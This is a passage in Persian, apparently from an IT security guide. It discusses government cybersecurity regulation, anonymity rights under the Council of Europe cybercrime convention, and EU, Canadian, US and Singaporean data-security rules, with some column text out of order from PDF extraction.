‫ﻳﺎﺩﺁﻭﺭ ﺷﺪ ﺩﺧﺎﻟﺖ ﺩﻭﻟﺖ ﻧﻴﺰ ﺩﺭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺿﺮﻭﺭﻱ ﻣـﻲﺑﺎﺷـﺪ‪،‬‬
‫ﭼﺮﺍﻛﻪ ﺑﺎﺯﺍﺭ ﻣﺼﺮﻑ ﺍﻧﮕﻴﺰﺓ ﻛـﺎﻓﻲ ﺑـﺮﺍﻱ ﺑـﺬﻝ ﺗﻮﺟـﻪ ﻻﺯﻡ ﺑـﻪ‬
‫ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﻳﺠﺎﺩ ﻧﻤﻲﻛﻨﺪ‪ :‬ﻗﻴﻤﺘﻬﺎﻱ ﺑﺎﺯﺍﺭ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﺯﺗـﺎﺏ‬
‫ﺩﻗﻴﻖ ﺳﻮﺩ ﻭ ﺯﻳﺎﻥ ﺳﺮﻣﺎﻳﻪ ﮔـﺬﺍﺭﻱ ﺑـﺮ ﺭﻭﻱ ﺍﻣﻨﻴـﺖ ﻧﻴـﺴﺖ؛ ﻭ‬
‫ﻻ ﻧـﻪ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﮔﺎﻥ ﻭ ﻧـﻪ ﻣـﺼﺮﻑﻛﻨﻨـﺪﮔﺎﻥ ﻫﻴﭽﻜـﺪﺍﻡ‬
‫ﻣﻌﻤﻮ ﹰ‬
‫ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ ﺗﻤـﺎﻡ ﭘﻴﺎﻣـﺪﻫﺎﻱ ﺭﻛـﻮﺩ ﻧﺎﺷـﻲ ﺍﺯ ﺑـﻲﺗـﻮﺟﻬﻲ ﺑـﻪ‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺗﺤﻤﻞ ﻛﻨﻨـﺪ؛ ﺍﺯ ﻃـﺮﻑ ﺩﻳﮕـﺮ ﻛﻨﺘـﺮﻝ ﺑـﺮ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﭘﺮﺍﻛﻨﺪﻩ ﺍﺳﺖ ﻭ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﭘﻴﭽﻴﺪﮔﻲ ﺷـﺒﻜﻪﻫـﺎ‪،‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﻩ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺸﻜﻞ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ‬
‫ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﻪ ﻭﺍﺑﺴﺘﮕﻲ ﺷﺪﻳﺪﻱ ﺑـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺩﺍﺭﻧــﺪ‪ ،‬ﺍﺯ ﺗﺎﺭﻳﺨﭽــﻪﺍﻱ ﻃــﻮﻻﻧﻲ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ ‪ -‬ﻧﻈﻴــﺮ‬
‫ﺿﻮﺍﺑﻂ ﺍﻳﻤﻨﻲ‪ ،‬ﺭﻗﺎﺑﺖ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﻣﺤﻴﻄﻲ ‪ -‬ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﺍﻣﺮﻭﺯﻩ‬
‫ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﺍﻥ ﺑﻄــﻮﺭ ﻓﺮﺁﻳﻨــﺪﻩﺍﻱ ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﺭﺍ ﺩﺭ ﻓﻬﺮﺳــﺖ‬
‫ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﺩﻭﻟﺘﻬﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﻘﺮﺭﺍﺕ ﻣﺨـﺎﻃﺮﻩﺁﻣﻴـﺰ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺯ ﺑﻌـﻀﻲ‬
‫ﺟﻬﺎﺕ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻭﺳﻴﻠﺔ ﺍﺭﺗﺒﺎﻃﻲ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻲﻗﺎﻧﻮﻥ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ‬
‫ﺍﺳﺖ‪ .‬ﺑﻄﻮﺭ ﻛﻠﻲ ﺭﻭﻧﺪ ﺟﻬﺎﻧﻲ ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ﮔﺬﺷـﺘﻪ ﺩﺭ ﺟﻬـﺖ‬
‫ﻗﺎﻧﻮﻥﺯﺩﺍﻳﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺭﻗﺎﺑـﺖ ﻭ ﻧـﻮﺁﻭﺭﻱ‪،‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬
‫ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻮﺭﺩ ﺗﺨﻠﻔﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺣـﻖ ﻣﻬـﻢ‬
‫ﺩﻳﮕﺮﻱ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻣﺸﺨﺺ ﻛﺮﺩﻩ ﺍﺳﺖ‪ :‬ﺣـﻖ‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑﺼﻮﺭﺕ ﮔﻤﻨـﺎﻡ‪ .٨٩‬ﮔـﺰﺍﺭﺵ ﺗﻔـﺴﻴﺮﻱ ﺍﻳـﻦ‬
‫ﻣﻌﺎﻫﺪﻩ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺍﺯ ﺍﺭﺍﺋﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺗﻮﻗـﻊ‬
‫ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﺛﺒﺖ ﻧـﺎﻡ ﻣـﺸﺘﺮﻛﻴﻦ ﺧـﻮﺩ ﺭﺍ ﻧـﺪﺍﺭﺩ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺑـﻪ‬
‫ﻣﻮﺟﺐ ﺍﻳﻦ ﻣﻌﺎﻫـﺪﻩ‪ ،‬ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻣﻠـﺰﻡ ﺑـﻪ ﺛﺒـﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺘﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺸﺘﺮﻛﻴﻦ ﻭ ﻳﺎ ﻣﻘﺎﻭﻣـﺖ ﺩﺭ‬
‫ﺑﺮﺍﺑﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻣﺴﺘﻌﺎﺭ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲ ﺑﺎﺷﻨﺪ‪ .‬ﺷـﻮﺭﺍﻱ‬
‫ﺍﺭﻭﭘــﺎ ﺩﺭ ﺳــﺎﻝ ‪ ۲۰۰۳‬ﺑﻴﺎﻧﻴــﻪﺍﻱ ﺭﺍ ﺩﺭ ﻣــﻮﺭﺩ ﺁﺯﺍﺩﻱ ﺍﺭﺗﺒﺎﻃــﺎﺕ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎ ﺍﻳﻦ ﻣﻀﻤﻮﻥ ﺑـﻪ ﭼـﺎﭖ ﺭﺳـﺎﻧﺪ‪" :‬ﺑﻤﻨﻈـﻮﺭ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺍﻧﺘﺸﺎﺭ ﺁﺯﺍﺩ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﻳﺪﻩﻫﺎ‪ ،‬ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﺑﺎﻳـﺪ ﺑـﻪ ﺍﻳـﺪﺓ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺍﺣﺘﺮﺍﻡ ﺑﮕﺬﺍﺭﻧﺪ ﻭ ﻧـﻪ ﻫﻮﻳـﺖ ﺁﻧـﺎﻥ"‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ‪،‬‬
‫ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺑﺼﻮﺭﺕ ﮔﻤﻨﺎﻡ ﺭﺍ‬
‫ﺑﻪ ﺭﺳﻤﻴﺖ ﺷﻨﺎﺧﺖ ﻭ ﺑﺎ ﺍﻧﺘﺸﺎﺭ ﺑﻴﺎﻧﻪﺍﻱ ﺩﺭ ﻣـﻮﺭﺩ ﻧﺤـﻮﺓ ﺍﻳﺠـﺎﺩ‬
‫ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻣﻦﺗﺮ ﺍﻇﻬﺎﺭ ﺩﺍﺷﺖ‪" :‬ﮔﻮﻧـﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺄﻳﻴﺪ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛﻪ ﺑـﺎ‬
‫ﺁﻥ ﺗﻌﺎﻣﻞ ﺩﺍﺭﻳﻢ ﻻﺯﻡ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﻌﻀﻲ ﻣﺤﻴﻄﻬـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﻻﺯﻡ ﺑﺎﺷــﺪ ﻳــﺎ ﺗــﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷــﻮﺩ ﻛــﻪ ﮔﻤﻨــﺎﻡ ﺑــﺎﻗﻲ ﺑﻤــﺎﻧﻴﻢ‪".‬‬
‫ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﻣﻄﺎﻟﻌـﺎﺕ ﺷـﺒﻜﻪ ﻭ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺳـﺎﻝ‬
‫‪ ۲۰۰۱‬ﺧﻮﺩ‪ ،‬ﺍﻇﻬﺎﺭ ﺩﺍﺷﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ٩٠‬ﺩﺭ ﺷﺒﻜﻪ ﻧﻴـﺰ ﺑﺎﻳـﺪ‬
‫ﺍﻣﻜﺎﻥ ﮔﻤﻨﺎﻡ ﻣﺎﻧﺪﻥ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﺧﺪﻣﺎﺕ ﻧﻴﺎﺯﻱ ﻧﻴﺴﺖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﻣﺸﺨﺺ ﺷﻮﺩ‪".‬‬
‫ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺩﺭ ﺧــﻂﻣــﺸﻲﻫــﺎﻱ ﺳــﺎﻝ ‪ OECD ۱۹۹۷‬ﻭ ﺩﺭ‬
‫ﮔﺰﺍﺭﺵ ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻧﺎﻣﺤـﺪﻭﺩ‬
‫ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﻭ ﺧﺪﻣﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻪ ﺷﺪﺕ ﺣﻤﺎﻳﺖ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٥٢‬‬
‫ﺣﺎﻣﻲ ﺗﻮﺳﻌﺔ ﺧﺪﻣﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻫـﺴﺘﻨﺪ‪ ،‬ﻭ ﻣﻨـﺎﺑﻊ ﺭﺍ‬
‫ﻛﺎﻫﺶ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺭﺍ ﺍﻓـﺰﺍﻳﺶ ﻣـﻲﺩﻫﻨـﺪ‪.‬‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﻓﻨﺎﻭﺭﻱ ﺑﻪ ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ‪ ،‬ﻗـﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ‬
‫ﺳﺪ ﺭﺍﻩ ﺍﺟﺮﺍﻱ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺍﺑﺘﻜﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺩﺭﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺳﺆﺍﻝ ﺍﺳﺎﺳﻲ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑﻬﺘـﺮﻳﻦ ﺭﻭﺵ‬
‫ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﭼﻴﺴﺖ؟ ﺑﻄـﻮﺭ ﻛﻠـﻲ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ‬
‫ﺍﺻﻞ ﺍﺳﺎﺳﻲ‪ ،‬ﺩﻭﻟﺖ ﻧﺒﺎﻳﺪ ﺿﻮﺍﺑﻂ ﻓﻨﺎﻭﺭﻱ ﺭﺍ ﺑـﻪ ﮔﺮﺩﺍﻧﻨـﺪﮔﺎﻥ ﻭ‬
‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﺤﻤﻴﻞ ﻛﻨﺪ‪ .‬ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ‬
‫ﺑﺎﻭﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ ﻭ ﺿﻮﺍﺑﻂ ﻣﺮﺗﺒﻂ ﺑﺎ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺗﺄﺛﻴﺮ‬
‫ﻭ ﺣﺘﻲ ﮔﺎﻫﻲ ﺯﻳﺎﻥﺁﻭﺭ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺩﺭ ﻋﻮﺽ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺗﺤﻤﻴﻞ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﺣﻔـﻆ‬
‫ﺍﻣﻨﻴﺖ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ ﺭﻭﻳﻜـﺮﺩ ﻛـﻪ ﺍﺯ ﻣﻔﻬـﻮﻡ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺣـﺮﻳﻢ‬
‫ﺧﺼﻮﺻﻲ ﺑﺮﺧﺎﺳﺘﻪ ﺑﻮﺩ‪ ،‬ﺩﺭ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎﻳﻲ ﻛـﻪ ﺩﺍﺩﻩ ﻫـﺎﻱ‬
‫ﺷﺨﺼﻲ ﺭﺍ ﺟﻤـﻊﺁﻭﺭﻱ ﻭ ﭘـﺮﺩﺍﺯﺵ ﻣـﻲﻛﺮﺩﻧـﺪ ﺍﺟﺒـﺎﺭﻱ ﺷـﺪ‪.‬‬
‫ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺗﻤﺮﻛـﺰ ﺑـﺮ ﺑﺨـﺸﻬﺎﻱ ﺧـﺎﺹ ﺍﻗﺘـﺼﺎﺩﻱ ﺍﺳـﺖ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺩﺭ ﺿـﻮﺍﺑﻄﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺣـﺮﻳﻢ‬
‫ﺧﺼﻮﺻﻲ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺑﻬﺪﺍﺷﺘﻲ ﻭ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻭﺿﻊ‬
‫ﻛﺮﺩﻩ‪ ،‬ﺍﻟﺰﺍﻣﺎﺗﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫـﺎﻱ ﺷﺨـﺼﻲ‬
‫ﮔﻨﺠﺎﻧﺪﻩ ﺍﺳﺖ‪ .‬ﺳﻨﮕﺎﭘﻮﺭ ﻫﻢ ﺭﻭﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺗﻤﺮﻛـﺰ ﻛـﺮﺩﻩ؛‬
‫ﺍﻣﺎ ﻧﻪ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ‪ -‬ﺧﻂﻣـﺸﻲﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳـﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺧـﺼﻮﺹ ﺍﺩﺍﺭﻩﻫـﺎﻱ ﺧـﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭘﺮﺩﺍﺧﺘﻪﺍﻧﺪ ﻭ ﻧﻪ ﺗﻬﺪﻳـﺪﺍﺕ‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺑـﺮﺍﻱ ﺗﺒـﺪﻳﻞ‬
‫ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﺮﺍﺣﻞ ﺍﻣﻨﻴﺘﻲ ﮔﺎﻡ ﺑﻪ ﮔـﺎﻡ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺑﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﻭﻟﺖ‪ ،‬ﺗﺄﻛﻴـﺪ ﺑـﺮ‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎ ﺑﻪ ﺟـﺎﻱ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻣـﻲ ﺑﺎﺷـﺪ‪ .‬ﺭﻭﻳﻜـﺮﺩ ﺩﻳﮕـﺮ ﺗﻬﻴـﺔ‬
‫ﺧﻂﻣﺸﻲﻫﺎ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻫﺎ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﻣﻜﻤـﻞ ﻳﻜـﺪﻳﮕﺮ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﺭﻭﭘﺎ ﺍﻋﻤﺎﻝ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭ ﺗﻤـﺎﻣﻲ ﺑﺨـﺸﻬﺎﻳﻲ ﻛـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﭘﺮﺩﺍﺯﺵ ﻣﻲﻛﻨﻨﺪ ﺁﻏﺎﺯ ﻛـﺮﺩﻩ‬
‫ﺍﺳﺖ‪ .‬ﻣﺎﺩﺓ ‪ ۱۷‬ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫـﺎﻱ ﺍﺗﺤﺎﺩﻳـﺔ ﺍﺭﻭﭘـﺎ‬
‫ﺩﺍﺭﻧﺪﮔﺎﻥ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ‬
‫ﺍﺯ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﺗﺨﺮﻳﺐ‪ ،‬ﺗﻐﻴﻴﺮ‪ ،‬ﺍﻓـﺸﺎﺳﺎﺯﻱ ﻳـﺎ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻏﻴﺮﻗﺎﻧﻮﻧﻲ )ﺑﻮﻳﮋﻩ ﺯﻣﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺷـﺎﻣﻞ ﺍﻧﺘﻘـﺎﻝ ﺩﺍﺩﻩﻫـﺎ ﻣﻴـﺎﻥ‬
‫ﺷﺒﻜﻪﻫﺎ ﺑﺎﺷﺪ( ﺍﻗﺪﺍﻣﺎﺕ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﻓﻨﻮﻥ ﻣﻨﺎﺳﺐ ﺭﺍ ﺑﻜـﺎﺭ ﮔﻴﺮﻧـﺪ‪.‬‬
‫ﺍﻳﻦ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻫﻤﭽﻨﻴﻦ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ "ﭼﻨﻴﻦ ﺍﻗﺪﺍﻣﺎﺗﻲ ﺑﺎﻳـﺪ‬
‫ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺨﺎﻃﺮﺍﺕ ﻃﺒﻴﻌﻲ ﭘـﺮﺩﺍﺯﺵ‬
‫ﺩﺍﺩﻩﻫﺎ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ"‪ .‬ﻛﺎﻧﺎﺩﺍ ﺭﻭﻳﻜﺮﺩ ﻣـﺸﺎﺑﻬﻲ ﺭﺍ ﺩﺭﭘـﻴﺶ ﮔﺮﻓﺘـﻪ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ‪ ،‬ﺑﺮ ﺍﺳﺎﺱ ﻣـﺼﻮﺑﺔ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺷﺨﺼﻲ ﻭ ﻣﺪﺍﺭﻙ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ٩٢‬ﺷﺮﻛﺘﻬﺎﻱ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ‬
‫ﻣﻮﻇﻔﻨﺪ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺗـﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺧﺎﺻﻲ ﺑﻴﺎﻧﺪﻳﺸﻨﺪ‪.‬‬
‫ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻣﻔﺼﻞﺗﺮﻱ ﺭﺍ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳـﺖ‬
‫ﻛــﻪ ﺑــﻪ ﻗــﻮﺍﻧﻴﻦ ﻣﺮﺑــﻮﻁ ﺑــﻪ ﺣﻔﺎﻇــﺖ ﺩﺭ ﺻــﻨﻌﺖ ﺍﺭﺗﺒﺎﻃــﺎﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲ ﭘـﺮﺩﺍﺯﺩ‪ .‬ﻣـﺎﺩﺓ ‪ ۴‬ﺍﻳـﻦ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻞ ﻣـﺸﺨﺺ‬
‫ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻳﻚ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﻩ ﺧﺪﻣﺎﺕ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ "ﺑﺎﻳﺪ‬
‫ﺍﻗﺪﺍﻣﺎﺗﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺧـﻮﺩ ﻭ ﺩﺭﺻـﻮﺭﺕ‬
‫ﻟﺰﻭﻡ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪﮔﺎﻥ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻋﻤﻮﻣﻲ ﺷﺒﻜﻪ )ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ‬
‫ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ( ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪ ".‬ﺩﻭﻡ ﺍﻳﻨﻜـﻪ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﮔﺎﻥ ﺍﺭﺗﺒﺎﻃـﺎﺕ‬
‫ﻋﻤﻮﻣﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺑﺎﻳﺪ ﺑﻪ ﻣﺸﺘﺮﻛﻴﻦ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﻧﻮﻉ ﺗﻬﺪﻳـﺪ‬
‫ﺍﻣﻨﻴﺘﻲ ﻫﺸﺪﺍﺭ ﺩﻫﻨﺪ ﻭ "ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺧﻄـﺮ ﺩﺭ ﺧـﺎﺭﺝ ﺍﺯ ﺣﻴﻄـﻪ‬
‫ﻗﺪﺭﺕ ﻭ ﺍﺧﺘﻴﺎﺭ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﺳـﺖ ﻫـﺮ ﻧـﻮﻉ ﺗﻐﻴﻴـﺮ ﺍﺯ‬
‫ﺟﻤﻠﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻧﺪ‪".‬‬
‫ﭼﮕﻮﻧﻪ ﺍﻳﻦ ﺍﻟﺰﺍﻣﺎﺕ ﻛﻠﻲ ﻋﻤﻠﻲ ﻣـﻲﺷـﻮﻧﺪ؟ ﺳـﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺍﻳـﻦ‬
‫ﻣﻮﺭﺩ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺧﺎﺹ ﺩﺍﺭﺩ‪ .‬ﻣﻘﺎﻣﺎﺕ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ )‪(MAS‬‬
